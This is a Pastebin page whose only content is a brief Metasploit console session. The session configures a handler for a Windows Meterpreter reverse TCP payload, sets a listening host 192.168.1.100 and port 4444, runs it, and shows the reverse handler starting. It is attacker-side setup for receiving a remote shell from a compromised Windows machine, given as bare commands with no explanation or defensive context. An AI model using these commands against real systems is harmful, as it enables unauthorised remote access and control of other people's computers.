Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 192.168.1.100
- LHOST => 192.168.1.100
- msf exploit(handler) > set LPORT 4444
- LPORT => 4444
- msf exploit(handler) > exploit
- [*] Starting the payload handler...
- [*] Started reverse handler
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement